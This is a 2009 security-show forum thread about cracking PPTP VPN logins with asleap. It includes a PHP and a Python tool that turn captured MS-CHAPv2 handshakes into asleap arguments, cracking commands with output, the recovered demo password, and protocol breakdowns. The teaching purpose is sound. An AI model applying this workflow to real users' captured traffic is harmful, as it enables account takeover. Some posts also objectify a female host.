Episode 6x12, Hacking PPTP VPNs with ASLEAP
Darren Kitchen
post Wed, 04 Nov 2009 11:53:03 +0000
Post #1


Hak.5 Junkie
************

Group: Root Admin
Posts: 3,008
Joined: Tue, 26 Jul 2005 15:52:42 +0000
From: Williamsburg, VA
Member No.: 2



Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.


Iain
post Wed, 04 Nov 2009 14:01:39 +0000
Post #2


Hak.5 Zombie
*****

Group: Members
Posts: 247
Joined: Thu, 11 May 2006 03:57:00 +0000
Member No.: 698



QUOTE (Darren Kitchen @ Wed, 04 Nov 2009 21:53:03 +0000) *
Continuing with the VPN Series, Darren discusses the inherent weaknesses in Microsoft’s PPTP authentication protocol, MS-CHAPv2, and demos a Linux tool that exploits these weaknesses.

Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.
Darren Kitchen
post Wed, 04 Nov 2009 15:00:27 +0000
Post #3


Hak.5 Junkie
************

Group: Root Admin
Posts: 3,008
Joined: Tue, 26 Jul 2005 15:52:42 +0000
From: Williamsburg, VA
Member No.: 2



QUOTE (Iain @ Wed, 04 Nov 2009 19:01:39 +0000) *
Darren - given the problems getting ASLEAP to work with the capture in the show, how about pasting the challenge/handshake from the demo capture directly into the command in the shell? I realise that the actual PW is unlikely to be in the list that was generated, but is it possible to add the password for the demo capture manually? If so and everything works, it might eliminate some things that caused the failure. I'll be interested to know what Josh's response is to your e-mail.

I have had a PPTP VPN configured but will certainly migrate to L2TP/IPSec now!

I look forward to the other VPN segments in due course.



I've uploaded one of my test packet captures to http://www.hak5.org/files/cap5.dump and the corresponding wordlist to http://www.hak5.org/files/wordlist.txt

The challenge is BEB90BD54A9D289758C9AE837944BC1B
The response is 725423423D1D0EB68B10DCB78743F97F0000000000000000

The username is "david" and the password is MurphyDade109 (If you check the wordlist you'll notice that before using Paul as a target I was going to go with characters from the movie Hackers.)

Feel free to have a go at it.

I did notice that if I told the RRAS server to only use CHAP instead of CHAPv2 I would get the expected 8 byte (16 chr) challenge, but the response would be all zeroes. Odd.

It kinda sucks that I wasn't able to produce a working demo, but this happens from time to time, and instead of scrapping the segment altogether (time constraints) I just made it work. Kinda. Anyway, hopefully someone else will have better luck and I hope to get this figured out soon.


Iain
post Wed, 04 Nov 2009 16:34:07 +0000
Post #4


Hak.5 Zombie
*****

Group: Members
Posts: 247
Joined: Thu, 11 May 2006 03:57:00 +0000
Member No.: 698



My challenge for the weekend!
Psychosis
post Wed, 04 Nov 2009 17:52:25 +0000
Post #5


Hak.5 Pirate
******

Group: Members
Posts: 436
Joined: Sun, 28 Jun 2009 04:32:18 +0000
From: Sydney, Australia
Member No.: 14,583



Pun intended?

I can't get it to work either. The challenge is too long for MS-CHAPv2, and for CHAP the response is just a bunch of zeroes.

(Why does ASLEAP compile under Backtrack 4 Pre-Final, but not under Ubuntu 9.04? Did I miss something?)


Sc00bz
post Wed, 04 Nov 2009 18:47:17 +0000
Post #6


Newbie


Group: Members
Posts: 5
Joined: Wed, 28 Jan 2009 15:44:54 +0000
Member No.: 12,711



Hmm I guess Darren doesn't read his email. Well here's what I emailed him.
CODE
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>asleap 2.2 Argument Generator</title>
<script type="text/javascript">
// <![CDATA[
// I so stole this function from phpBB
function selectCode()
{
   // Get ID of code block
   var e = document.getElementsByTagName('CODE')[0];

   // Not IE
   if (window.getSelection)
   {
      var s = window.getSelection();
      // Safari
      if (s.setBaseAndExtent)
      {
         s.setBaseAndExtent(e, 0, e, e.innerText.length - 1);
      }
      // Firefox and Opera
      else
      {
         var r = document.createRange();
         r.selectNodeContents(e);
         s.removeAllRanges();
         s.addRange(r);
      }
   }
   // Some older browsers
   else if (document.getSelection)
   {
      var s = document.getSelection();
      var r = document.createRange();
      r.selectNodeContents(e);
      s.removeAllRanges();
      s.addRange(r);
   }
   // IE
   else if (document.selection)
   {
      var r = document.body.createTextRange();
      r.moveToElementText(e);
      r.select();
   }
}
// ]]>
</script>
</head>
<body>
<div style="width:90%; margin:auto;">
<?php
if (isset($_GET['u'], $_GET['c'], $_GET['r']))
{
    $c = str_replace(':', '', $_GET['c']);
    $r = str_replace(':', '', $_GET['r']);
    $chapChallengeGood = preg_match("/^[0-9a-f]{32}$/i", $c);
    $chapResponseGood  = preg_match("/^[0-9a-f]{98}$/i", $r);
    if ($chapChallengeGood == 0)
    {
        echo 'Invalid CHAP Challenge.<br />';
    }
    if ($chapResponseGood == 0)
    {
        echo 'Invalid CHAP Response.<br />';
    }
    if ($chapChallengeGood && $chapResponseGood)
    {
        // **** This is the interesting part ****
        $userName = $_GET['u'];
        $authChallenge = pack('H*', $c);
        $peerChallenge = pack('H*', substr($r, 0, 32));
        $challenge = substr(sha1($peerChallenge . $authChallenge . $userName), 0, 16);
        $response = substr($r, 48, 48);
        $challenge = preg_replace("/([0-9a-f]{2})/i", '$1:', $challenge, 7);
        $response = preg_replace("/([0-9a-f]{2})/i", '$1:', $response, 23);
        // **** This is the interesting part ****
    }
}
?>
    <form method="get">
        User Name:<br />
        <input type="text" name="u" /><br />
        <br />
        "PPP CHAP Challenge" (16 bytes, 32 Hex characters):<br />
        <input type="text" name="c" size="45" /><br />
        <br />
        "PPP CHAP Response" (49 bytes, 98 Hex characters):<br />
        <input type="text" name="r" size="137" /><br />
        <input type="submit" value="Generate asleap arguments" />
    </form>
<?php
if (isset($challenge, $response))
{?>    <br />
    <a href="#" onclick="selectCode(); return false;">Select All</a><br />
    <div style="overflow:auto; width:100%;"><code style="white-space:pre;">./asleap -C <?php echo $challenge; ?> -R <?php echo $response; ?> -f words.dat -n words.idx</code></div>
<?php
}
?>
</div>
</body>
</html>

The PHP file will convert the CHAP challenge and response packet data into asleap arguments.

To copy the data from the packet right click on the value then "Copy" -> "Bytes (Hex Stream)" or "Copy" -> "Value" (if you have a newer version of Wireshark). "Copy" -> "Value" inserts the colons in between each byte which isn't necessary for the PHP file.

Your example in 6x12:
"CHAP Challenge": e1c0e8923252b20b5561ddf404310826
"CHAP Response": d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce1267513fcf682b521800

"CHAP Challenge" packet is the "auth challenge" 16 byte value.
"CHAP Response" packet has the "peer challenge" 16 byte value and the peer response 24 byte value.

user name is paul
auth challenge is e1c0e8923252b20b5561ddf404310826
peer challenge is d4cfa66f00364d66fbf65f85de927930
peer response is 025b3bae30a50be25e47625c2d13ce1267513fcf682b5218
this gives you a challenge of 6a0062c675397a16
I do not know what the null characters are for, but they are probably just there for padding.

You should get this from the PHP file:
./asleap -C 6a:00:62:c6:75:39:7a:16 -R 02:5b:3b:ae:30:a5:0b:e2:5e:47:62:5c:2d:13:ce:12:67:51:3f:cf:68:2b:52:18 -f words.dat -n words.idx

When you run that with your word list it says:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        ebcd
    Could not find a matching NT hash.  Try expanding your password list.
    I've given up.  Sorry it didn't work out.


It found the hash bytes but the password seems to not be in the word list. Also you can't create a useful rainbow table for this since you only have 2 bytes of the hash.

-------------------

For the one posted above do the same thing.
user name is david
"CHAP Challenge" is e1c0e8923252b20b5561ddf404310826
"CHAP Response" is d4cfa66f00364d66fbf65f85de9279300000000000000000025b3bae30a50be25e47625c2d13ce1267513fcf682b521800

This gives you:
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

Now run:
./genkeys -r wordlist.txt -f words.dat -n words.idx
./asleap -C b9:fb:c2:b1:65:05:e5:26 -R 26:6a:63:57:d7:10:1b:4c:89:5e:d0:37:32:bb:6b:38:2d:89:67:a9:96:04:33:63 -f words.dat -n words.idx

And you'll get:
CODE
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    hash bytes:        31cf
    NT hash:           5635283972918a8f9fb608418d9331cf
    password:          MurphyDade109
Psychosis
post Wed, 04 Nov 2009 20:43:10 +0000
Post #7


Hak.5 Pirate
******

Group: Members
Posts: 436
Joined: Sun, 28 Jun 2009 04:32:18 +0000
From: Sydney, Australia
Member No.: 14,583



Nice.


BuddhaChu
post Wed, 04 Nov 2009 23:00:17 +0000
Post #8


Hak.5 Fan
**

Group: Members
Posts: 22
Joined: Mon, 22 Dec 2008 23:44:39 +0000
Member No.: 12,310



Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.

http://revision3.com/forum/showthread.php?t=31345
Darren Kitchen
post Thu, 05 Nov 2009 10:32:19 +0000
Post #9


Hak.5 Junkie
************

Group: Root Admin
Posts: 3,008
Joined: Tue, 26 Jul 2005 15:52:42 +0000
From: Williamsburg, VA
Member No.: 2



QUOTE (Sc00bz @ Thu, 05 Nov 2009 00:47:17 +0000) *
Hmm I guess Darren doesn't read his email.




I want to read it all, honestly I do. And I will, eventually. But I have a to-do list a mile long and all I can attack these buckets of email with is a soup spoon.

Anyway, thanks. I need to wrap my head around those functions. I knew it had something to do with the encoding. I'll be sure to highlight this in a coming episode. Probably not the very next since it'll be live at Va Tech.

QUOTE (BuddhaChu @ Thu, 05 Nov 2009 05:00:17 +0000) *
Please make sure someone from Rev3 fixes the HD 30fps mp4 version. It's jacked up.


There was an editing mistake that caused a re-render and re-release of the show. You may have caught a bad version. Is it still messed up?

(If you caught the show early and pay attention to the bear ad you'll see what I mean)


Wetwork
post Thu, 05 Nov 2009 15:55:36 +0000
Post #10


Hak.5 Fan ++
****

Group: Members
Posts: 118
Joined: Tue, 14 Apr 2009 13:15:47 +0000
From: New Yawk
Member No.: 13,650



Good episode!!!

asleap is a good tool IF you can get it to work, you have all the info that you need to perform a successful attack, and you have a dictionary large enough and tailored enough to make a successful go at it.

I am just blown away that after weeks of throwing the request out... Paul finally made it in front of the camera, and not only that, we see him in his awesome party suit for the domain.com sponsor spot. That was worth the wait!!! As well as the look of pure horror on Jason's face when he opened the door to see Paul in the Pink Party Suit.

Paul, I am glad that they released you from your chains of bondage behind the camera. I hope that this is going to be an ongoing trend and not just when Snubs and Matt abandon Darren for parts unknown. Stand up for your rights, camera guy, and demand a segment of your own!!!

Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her.

It's great to see Hak5 back to real hacking again; brings a warm fuzzy to my old heart!


--------------------
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard
Psychosis
post Thu, 05 Nov 2009 16:21:28 +0000
Post #11


Hak.5 Pirate
******

Group: Members
Posts: 436
Joined: Sun, 28 Jun 2009 04:32:18 +0000
From: Sydney, Australia
Member No.: 14,583



QUOTE (Wetwork @ Fri, 06 Nov 2009 07:55:36 +0000) *
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her.

Where did you get that from?


Wetwork
post Thu, 05 Nov 2009 16:58:50 +0000
Post #12


Hak.5 Fan ++
****

Group: Members
Posts: 118
Joined: Tue, 14 Apr 2009 13:15:47 +0000
From: New Yawk
Member No.: 13,650



QUOTE (Psychosis @ Thu, 05 Nov 2009 16:21:28 +0000) *
Where did you get that from?


Darren mentioned it when he was creating the list of Paul passwords for asleap... Don't know if he was just "rolling" with it for the sake of the segment or if it was true...


--------------------
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard
Psychosis
post Thu, 05 Nov 2009 17:45:30 +0000
Post #13


Hak.5 Pirate
******

Group: Members
Posts: 436
Joined: Sun, 28 Jun 2009 04:32:18 +0000
From: Sydney, Australia
Member No.: 14,583



I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed off cupp.py, and that they had a son named Paul.


Coreyja
post Fri, 06 Nov 2009 04:08:38 +0000
Post #14


Hak.5 Fan
**

Group: Members
Posts: 20
Joined: Sun, 14 Jun 2009 17:46:37 +0000
From: 80126
Member No.: 14,407



QUOTE (Wetwork @ Thu, 05 Nov 2009 14:55:36 +0000) *
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her.


I could be totally wrong on this so don't yell at me but aren't Snubs and Darren going out?


Wetwork
post Fri, 06 Nov 2009 08:51:50 +0000
Post #15


Hak.5 Fan ++
****

Group: Members
Posts: 118
Joined: Tue, 14 Apr 2009 13:15:47 +0000
From: New Yawk
Member No.: 13,650



QUOTE (Psychosis @ Thu, 05 Nov 2009 17:45:30 +0000) *
I thought it was just for the password generation - Darren also said that Shannon was 'married' to Matt the first time they showed off cupp.py, and that they had a son named Paul.


Snubs, you sexy minx, getting around, aren't you?

Whoever Shannon is going out with, he is a lucky guy.


--------------------
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard
scrapheap
post Fri, 06 Nov 2009 11:07:02 +0000
Post #16


Hak.5 Fan ++
****

Group: Members
Posts: 90
Joined: Fri, 22 May 2009 06:53:22 +0000
Member No.: 14,133



QUOTE (Wetwork @ Thu, 05 Nov 2009 20:55:36 +0000) *
Snubs and Paul??? Married????? Really??? Say it isn't so??? If that is the case there are thousands of 16yo Hak5 fans that are crying in their Mountain Dews and Jolt colas over their dreams of someday interfacing with her.


I was going to say something about it not being only 16yo Hak5 fans but then realised I was starting to sound like a crazy stalker/serial killer.
Wetwork
post Fri, 06 Nov 2009 13:34:48 +0000
Post #17


Hak.5 Fan ++
****

Group: Members
Posts: 118
Joined: Tue, 14 Apr 2009 13:15:47 +0000
From: New Yawk
Member No.: 13,650



QUOTE (scrapheap @ Fri, 06 Nov 2009 11:07:02 +0000) *
I was going to say something about it not being only 16yo Hak5 fans but then realised I was starting to sound like a crazy stalker/serial killer.


I'm sure that there are many Hak5 fans of all ages that are stripping their cable over Snubs, but in reality who could blame them? She is a hottie.


--------------------
Security is a warm blanket of mistrust
Want computer security? .....Grab the black cable and yank it real hard
Darren Kitchen
post Tue, 17 Nov 2009 18:04:57 +0000
Post #18


Hak.5 Junkie
************

Group: Root Admin
Posts: 3,008
Joined: Tue, 26 Jul 2005 15:52:42 +0000
From: Williamsburg, VA
Member No.: 2



Comments from Sc00bz code:

CODE
"pack('H*', $str)" converts $str from a hex string to binary data. This is the opposite of the PHP function bin2hex(). I would love to just use hex2bin() but that function doesn't exist in PHP.

--------------------------

In MS-CHAPv2 (RFC 2759) the server sends a 16 byte authenticator challenge to the client and the client generates another 16 bytes of random data called the peer challenge. Using the peer challenge, authenticator challenge, and user name the client generates the 8 byte challenge. Then using the 8 byte challenge the client generates the response and sends the peer challenge and the response.

// Short version (just the 8 byte challenge generation):
// sha1() is the same one in PHP
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
// ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
challenge = substr(sha1BinaryData, 0, 8)
// ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)


You can stop here if you just want to know how the 8 byte challenge is generated.


// Long version (full MS-CHAPv2):
response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use

string /*24 bytes*/ MS_CHAPv2(string userName, string authenticatorChallenge /*16 bytes*/, string peerChallenge /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true) // 20 bytes returned
challenge = substr(sha1BinaryData, 0, 8)
response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}

// sha1() is the same one in PHP
string sha1(string str[, bool raw_output = false])
{
// If the optional raw_output is set to TRUE, then
// the sha1 digest is instead returned in raw binary
// format with a length of 20, otherwise the returned
// value is a 40-character hexadecimal number.
}

string /*24 bytes*/ ChallengeResponse(string challenge /*8 bytes*/, string hash /*16 bytes*/)
{
hashPadded = hash . "\x00\x00\x00\x00\x00" // cat 5 null characters

response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
return response
}

string /*8 bytes*/ DesEncrypt(string message /*8 bytes*/, string key /*7 bytes*/)
{
// Encrypts message using key and returns cipher text (8 bytes).
}

-------
Ex:
userName = "bob" // 626f62
authenticatorChallenge = "auth_challenge.." // 617574685f6368616c6c656e67652e2e
peerChallenge = "peer_challenge.." // 706565725f6368616c6c656e67652e2e
ntlmHash = ntlm("password") // 8846f7eaee8fb117ad06bdd830b7586c

response = MS_CHAPv2(userName, authenticatorChallenge, peerChallenge, ntlmHash)
// { inside of MS_CHAPv2()
// sha1BinaryData = sha1(peerChallenge . authenticatorChallenge . userName, true)
// // ab8031f17836bd56fe75174ce22d8ddabae837c2 = sha1("peer_challenge..auth_challenge..bob", true)
// challenge = substr(sha1BinaryData, 0, 8)
// // ab8031f17836bd56 = substr(ab8031f17836bd56fe75174ce22d8ddabae837c2, 0, 8)
// response = ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
// // { inside of ChallengeResponse()
// // hashPadded = ntlmHash . "\x00\x00\x00\x00\x00" // cat 5 null characters
// // // 8846f7eaee8fb117ad06bdd830b7586c0000000000
// //
// // response = DesEncrypt(challenge, substr(hashPadded, 0, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 7, 7))
// // response .= DesEncrypt(challenge, substr(hashPadded, 14, 7))
// // return response
// // // bc4acb4a3953680e = DesEncrypt(ab8031f17836bd56, 8846f7eaee8fb1)
// // // ... abd6fd979ad078aa .= DesEncrypt(ab8031f17836bd56, 17ad06bdd830b7)
// // // ... 5c21b44e13ea7df2 .= DesEncrypt(ab8031f17836bd56, 586c0000000000)
// // // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// // }
// return response
// // return bc4acb4a3953680eabd6fd979ad078aa5c21b44e13ea7df2
// }
responsePacketValue = peerChallenge .
"\x00\x00\x00\x00\x00\x00\x00\x00" . // 8 bytes of padding
response .
"\x00"; // flag reserved for future use
// 706565725f6368616c6c656e67652e2e0000000000000000bc4acb4a3953680eabd6fd979ad078aa

--------------------------
--------------------------

Just for completeness here is MS-CHAPv1:
In MS-CHAPv1 (RFC 2433) the server sends the 8 byte challenge to the client and the client returns lmResponse and ntlmResponse. This is the same algorithm as NTLMv1 for SMB shared folders. Rainbow tables (halflmchall, lmchall, ntlmchall) can be made to attack this algorithm by spoofing a server with a constant challenge; most commonly the challenge is 1122334455667788.

response = MS_CHAPv1(challenge, lmHash, ntlmHash)
responsePacketValue = response .
"\x0?"; // "Use Windows NT compatible challenge response" flag

string /*48 bytes*/ MS_CHAPv1(string challenge /*8 bytes*/, string lmHash /*16 bytes*/, string ntlmHash /*16 bytes*/)
{
response = ChallengeResponse(challenge, lmHash) // 24 bytes returned
response .= ChallengeResponse(challenge, ntlmHash) // 24 bytes returned
return response
}
/* Quoted from RFC 2433:
The "use Windows NT compatible challenge response" flag, if 1,
indicates that the Windows NT response is provided and should be used
in preference to the LAN Manager response. The LAN Manager response
will still be used if the account does not have a Windows NT password
hash, e.g. if the password has not been changed since the account
was uploaded from a LAN Manager 2.x account database. If the flag is
0, the Windows NT response is ignored and the LAN Manager response is
used. Since the use of LAN Manager authentication has been
deprecated, this flag SHOULD always be set (1) and the LAN Manager
compatible challenge response field SHOULD be zero-filled.
*/
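The capture-to-asleap conversion Sc00bz describes in post #6, together with the RFC 2759 ChallengeHash() step that post #18 walks through, as an added Python example (not the thread's PHP tool and not part of asleap): the function names are mine, and the only input data are the "paul" CHAP Challenge and CHAP Response values quoted earlier in this thread.

```python
"""Split a PPP CHAP Response into its MS-CHAPv2 fields and derive the
8-byte challenge that asleap expects (RFC 2759 ChallengeHash).

Added example for this thread; not the PHP tool posted above and not asleap code.
"""
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def clean_hex(value: str) -> str:
    """Accept Wireshark 'Bytes (Hex Stream)' or colon-separated 'Value' output."""
    return value.replace(":", "").strip()


def parse_chap_response(hex_value: str) -> dict:
    """Split the 49-byte MS-CHAPv2 Response value (RFC 2759 section 4):
    16-byte Peer-Challenge, 8 reserved (zero) bytes, 24-byte NT-Response, 1 Flags byte."""
    h = clean_hex(hex_value)
    if len(h) != 98 or not HEX_RE.match(h):
        raise ValueError("Invalid CHAP Response: expected 49 bytes (98 hex characters)")
    raw = bytes.fromhex(h)
    return {
        "peer_challenge": raw[0:16],
        "reserved": raw[16:24],
        "nt_response": raw[24:48],
        "flags": raw[48],
    }


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash: first 8 bytes of SHA1(PeerChallenge || AuthChallenge || UserName).
    The user name is an octet string; the PHP tool passed it through untouched, as done here."""
    if len(peer_challenge) != 16 or len(auth_challenge) != 16:
        raise ValueError("both challenges must be 16 bytes")
    digest = hashlib.sha1(peer_challenge + auth_challenge + username.encode("utf-8")).digest()
    return digest[:8]


def colon_hex(data: bytes) -> str:
    """Format bytes the way asleap's -C / -R options expect (aa:bb:cc...)."""
    return ":".join(f"{b:02x}" for b in data)


def asleap_args(username: str, chap_challenge_hex: str, chap_response_hex: str) -> str:
    """Build the same asleap command line the PHP argument generator printed."""
    c = clean_hex(chap_challenge_hex)
    if len(c) != 32 or not HEX_RE.match(c):
        raise ValueError("Invalid CHAP Challenge: expected 16 bytes (32 hex characters)")
    fields = parse_chap_response(chap_response_hex)
    challenge = challenge_hash(fields["peer_challenge"], bytes.fromhex(c), username)
    return (f"./asleap -C {colon_hex(challenge)} -R {colon_hex(fields['nt_response'])}"
            " -f words.dat -n words.idx")


# Packet values for user "paul" as quoted from the episode capture in this thread.
PAUL_CHALLENGE = "e1c0e8923252b20b5561ddf404310826"
PAUL_RESPONSE = ("d4cfa66f00364d66fbf65f85de9279300000000000000000"
                 "025b3bae30a50be25e47625c2d13ce1267513fcf682b521800")

if __name__ == "__main__":
    print(asleap_args("paul", PAUL_CHALLENGE, PAUL_RESPONSE))
```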

